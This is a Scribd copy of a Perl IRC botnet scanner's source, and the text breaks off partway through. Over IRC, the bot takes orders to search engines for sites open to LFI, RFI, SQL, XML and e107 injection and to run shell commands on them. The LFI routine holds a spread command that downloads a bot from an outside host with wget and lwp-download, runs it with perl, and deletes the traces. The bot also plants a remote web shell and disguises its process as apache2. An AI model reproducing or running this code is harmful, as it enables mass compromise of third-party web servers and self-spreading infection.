Scribd
Upload
650 views31 pages

Bot Scanner

This document contains the source code for a Perl script that functions as a multi-purpose network scanner. It includes features for scanning websites for SQL injection, file inclusion, and XML vulnerabilities. It also allows commands to be executed on remote servers through vulnerabilities. The code connects to IRC to report scan results and includes functions for encoding/decoding text and joining additional IRC channels.

Uploaded by

Rolando Lewandoswky
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
650 views31 pages

Bot Scanner

This document contains the source code for a Perl script that functions as a multi-purpose network scanner. It includes features for scanning websites for SQL injection, file inclusion, and XML vulnerabilities. It also allows commands to be executed on remote servers through vulnerabilities. The code connects to IRC to report scan results and includes functions for encoding/decoding text and joining additional IRC channels.

Uploaded by

Rolando Lewandoswky
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 31

#!

/usr/bin/perl
$powered="preda";
$mail="[email protected]";
##############################################################################
#######
##
##
##
23/07/201
0
##
## Author : BaMbY, Voo_Doo
##
## Team
: Irc.Byroe.Net
##
## Modifier : rato
##
## Team
: Irc.NairaLanders.Net
##
##
##
## ## DISCLAIMER ###########################################################
##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY #
##
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK!!!
#
##
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS FIND BUGS ON
#
##
## # THEIR SYSTEM.
#
##
## ## END OF DISCLAIMER ####################################################
##
##
##
## Features:
##
##
[+]e107 Injection Scanner
##
##
[+]Sql Injection Scanner
##
##
[+]XML (Extensible Markup Language) Injection Scanner
##
##
[+]Remote File Inclusion Scanner
##
##
[+]Local File Inclusion Scanner
##
##
[+]Integrated Shell, so you can execute commands on the server
##
##
[+]Spread Mode, to activate or disable Spread Function
##
##
##
##############################################################################
#######
################################################
use HTTP::Request;
#
use LWP::UserAgent;
#
use IO::Socket;
#
use IO::Select;
#
use IO::Socket::INET;
#

use Socket;
#
use HTTP::Request::Common;
#
use LWP::Simple;
#
use LWP 5.64;
#
use HTTP::Request::Common qw(POST);
#
use Digest::MD5 qw(md5_hex);
#
use MIME::Base64;
#
################################################
#
#
################################################
#
[CONFIGURATION]
#
################################################
my $fakeproc
= "/usr/sbin/apache2 -k start";
$ircserver
= "Diemen.NL.EU.Undernet.Org";
my $ircport
= "6667";
my $nickname
= "predascan1";
my $ident
= "prdsc1";
my $channel
= "#mynet";
my $runner
= "preda";
my $fullname
= 'prdsc1';
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/enviro
n%00";
my $rfiid
= "http://jewelleryoutlook.com/js/cmd.jpg?";
################################################
#
[COMMANDS]
#
################################################
my $lfi
= "!lfi";
my $xml
= "!xml";
my $e107
= "!e107";
my $sql
= "!sql";
my $rfi
= "!rfi";
my $cmdlfi
= "!cmdlfi";
my $cmde107
= "!cmde107";
my $cmdxml
= "!cmdxml";
################################################
#
[END OF CONFIGURATION]
#
################################################
my @tabele
= ('admin','tblUsers','tblAdmin','user','users','usernam
e','usernames','usuario',
'name','names','nombre','nombres','usuar
ios','member','members','admin_table','miembro','miembros','membername','admins'
,'administrator',
'administrators','passwd','password','pa
sswords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_
name','user_names',
'member_password','mods','mod','moderato
rs','moderator','user_email','user_emails','user_mail','user_mails','mail','emai
ls','email','address',
'e-mail','emailaddress','correo','correo
s','phpbb_users','log','logins','login','registers','register','usr','usrs','ps'
,'pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','ni
ck','nicks','manager','managers','administrador','tUser','tUsers','administrador
es','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','co
ntrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logo
n','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','faz
erlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_
authors','accounts','account','accnts',

'associated','accnt','customers','custom
er','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','pa
ssword','amministratore','god','God','authors',
'asociado','asociados','autores','member
name','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios
','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIE
MBRO');
my @kolumny
= ('admin_name','cla_adm','usu_adm','fazer','logon','faz
erlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','us
er_name','user_username','uname','user_uname','usern','user_usern','un','user_un
','mail',
'usrnm','user_usrnm','usr','usernm','use
r_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id'
,'author',
'sistema_usuario','auth','key','memberna
me','nme','unme','psw','password','user_password','autores','pass_hash','hash','
pass','correo',
'userpass','user_pass','upw','pword','us
er_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','
authors',
'user_pwd','u_pass','clave','usuario','c
ontrasena','pas','sistema_password','autor','upassword','web_password','web_user
name');
$SIG{'INT'}
= 'IGNORE';
$SIG{'HUP'}
= 'IGNORE';
$SIG{'TERM'}
= 'IGNORE';
$SIG{'CHLD'}
= 'IGNORE';
$SIG{'PS'}
= 'IGNORE';
chdir("/tmp");
$ircserver="$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0"x16;;
&SIGN();
my $pid = fork;
exit if $pid;
die "\n [!] Something Wrong !!!: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_c
on", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
nick("$mynick");
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname
");
sleep 1;
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
}
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick|".int rand(99));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $nickname +Bx");
sendraw("JOIN $channel");
sendraw("PRIVMSG $channel :14,17ratoscan Multi7-14Scanner is Ready To 7S14can!
");
sendraw("PRIVMSG $runner :14,17H14i $runner my 7L14ord, I'm ready to work for
7Y14ou!!!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircpo
rt"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
if ($msg=~ /PRIVMSG $channel :!help/){

sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)


14 ################## 7Vuln Scanner 14###################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 #
7 ( $rfi/$lfi/$sql/$xml ) [bug] [dork]
14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ################### 7RCE Command 14###################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 #
7 $e107 [dork]
14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ################# 7Execute Command 14#################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 #7 ( $cmde107 /$cmdlfi / $cmdxml ) [target] [cmd] 14#");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ################### 7md5 Command 14###################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 #
7 !dec / !enc
14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 #################### 7BOT Info 14#####################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 # 7 !resp
on | !engine | !pid | !version | !about 14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ###################################################");
}
if ($msg=~ /PRIVMSG $channel :!version/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Version14) 14 Multi
Scanner v2.1");
}
if ($msg=~ /PRIVMSG $channel :!engine/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Engine14)7 Google, B
ing, AllTheWeb, Altavista, ASK, UOL, Yahoo.");
}
if ($msg=~ /PRIVMSG $channel :!pid/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14PID14)14 Process/ID
: 7 $fakeproc - $$");
}
if ($msg=~ /PRIVMSG $channel :!about/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14About14) 14 Multi Sc
anner v2");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14About14) 14 Coded by
BaMbY7 | 14Modified By RatoScan ");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14About14) 14 Copyrigh
t ? 2010 NairaLanders");
}
##################################################################### CM
D IRC
if ($msg=~ /PRIVMSG $channel :!enc\s+(.*)/){
my $enc = $1;
&enc($enc);
}
if ($msg=~ /PRIVMSG $channel :!dec\s+(.*)/){
my $dec = $1;
&dec($dec);
}
if ($msg=~ /PRIVMSG $channel :!btjoin\s+(.*)/){
my $cnls = $1;
&join($cnls);
}
if ($msg=~ /PRIVMSG $channel :!btpart\s+(.*)/){
my $cnls = $1;
&part($cnls);

}
if ($msg=~ /PRIVMSG $channel :!okdeh\s+(.*)/){
my $cnls = $1;
&quit($cnls);
}
if ($msg=~ /PRIVMSG $channel :!respon/){
my $re = query($rfiid);
if ( $re =~ /ByroeNet/ ) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Info14) 7 Respon
se is 3WORKING!");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Info14) 7 Respon
se is 4NOT WORKING!");
}
}
##################################################################### CM
D LFI
if ($msg=~ /PRIVMSG $channel :$cmdlfi\s+(.*?)\s+(.*)/){
my $url = $1."../../../../../../../../../../../../../../
../proc/self/environ%00";
my $cmd = $2;
&cmdlfi($url,$cmd);
}
#####################################################################
#####################
LFI LFI LFI
###################
##################################################################### Go
ogle Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)14 Dor
k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)14 Sea
rch Engines Loading ...");
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;

&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine

if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {


if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
#####################
XML XML XML
###################
################################################################
#####
if ($msg=~ /PRIVMSG $channel :$cmdxml\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd);
}
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)14 Dor
k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)14 Sea
rch Engines Loading ...");
&xmlscan($engx,$bugx,$d0rk);
}
exit;

}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {

if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
################################################################
#####
#####################
RFI RFI RFI
###################
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)14 Dor

k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)14 Sea
rch Engines Loading ...");
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}

}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
################################################################
#####
#####################
SQL SQL SQL
###################
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {

waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14 Dor
k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14 Sea
rch Engines Loading ...");
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {

if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}

################################################################
#####
#####################
e107 e107 e107
###################
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$cmde107\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmde107($url,$cmd);
}
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = "/contact.php";
my $d0rk = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)14 Do
rk :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)14 Fi
le :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)14 Se
arch Engines Loading ...");
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);

}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {

waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
##################################################################### Procedure
sub cmdlfi() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $cmd = $_[1];
my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
$browser->agent("$hie");
$browser->timeout(3);
$response = $browser->get( $url );
if ($response->content =~ /j13mbut(.*)j13mbut/s) {
print $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI-CMD14)7 $1");
}
}
sub lfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @lfigoogle=&google($dork);
push(@lfitotal, @lfigoogle);
}
if ($engz =~ /AllTheWeb/) {
my @lfialltheweb=&alltheweb($dork);
push(@lfitotal, @lfialltheweb);

}
if ($engz =~ /Bing/) {
my @lfiBing=&Bing($dork);
push(@lfitotal, @lfiBing);
}
if ($engz =~ /ALtaViSTa/) {
my @lfialtavista=&altavista($dork);
push(@lfitotal, @lfialtavista);
}
if ($engz =~ /AsK/) {
my @lfiask=&ask($dork);
push(@lfitotal, @lfiask);
}
if ($engz =~ /UoL/) {
my @lfiuol=&uol($dork);
push(@lfitotal, @lfiuol);
}
if ($engz =~ /YahOo/) {
my @lfiyahoo=&yahoo($dork);
push(@lfitotal, @lfiyahoo);
}
my @lficlean = &calculate(@lfitotal);
if (scalar(@clean) != 0) {
}
my $uni=scalar(@lficlean);
foreach my $lfitarget (@lficlean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)(4@14$engz14) Sc
anning Done For7 $dork");
}
my $lfi = "../../../../../../../../../../../../../../..";
my $xpl = "http://".$lfitarget.$bugz.$rspo_test;
my $vuln = "http://".$lfitarget."2".$bugz."12".$rspo_test."";
my $re = getcontent($xpl);
if ($re =~ /DOCUMENT_ROOT=\// && $re =~ /HTTP_USER_AGENT/){
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; }
else {
my $rspo = lfiexploit($xpl,"uname -svnrp;echo J13mb0T;id");
$rspo =~ s/\n//g;
if ($rspo =~ /j13mb0t#(.*)J13mb0Tuid=(.*)#j13mb0t/sg) {
my ($sys,$uid) = ($1,$2);
my $lfispread = "cd /tmp;lwp-download
http://www.otbr.com.br/bot.txt;perl bot.txt;rm -rf *.txt*;wget http://www.otbr.c
om.br/bot.txt;perl bot.txt;rm -rf *.txt*";
my $tmp = "/tmp/cmd".int rand(2010);
my $upload = lfiexploit($xpl,"wget $rfiid -O $tmp;$lfispread
"); sleep(1);
my $res = getcontent("http://".$lfitarget.$bugz.$lfi.$tmp.'%
00');
if ($res =~ /ratoscan4/) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)(4
@14$engz14)14(7@14PHPSheLL14)3 http://".$lfitarget."12".$bugz."10".$lfi."6".$tmp."%00 14(0".
$sys."14)");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14LFI14)(4@1
4$engz14)14(7@14PHPSheLL14)3 http://".$lfitarget."12".$bugz."10".$lfi."6".$tmp."%00 14(0".$
sys."14)");
}
else {

sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)(4


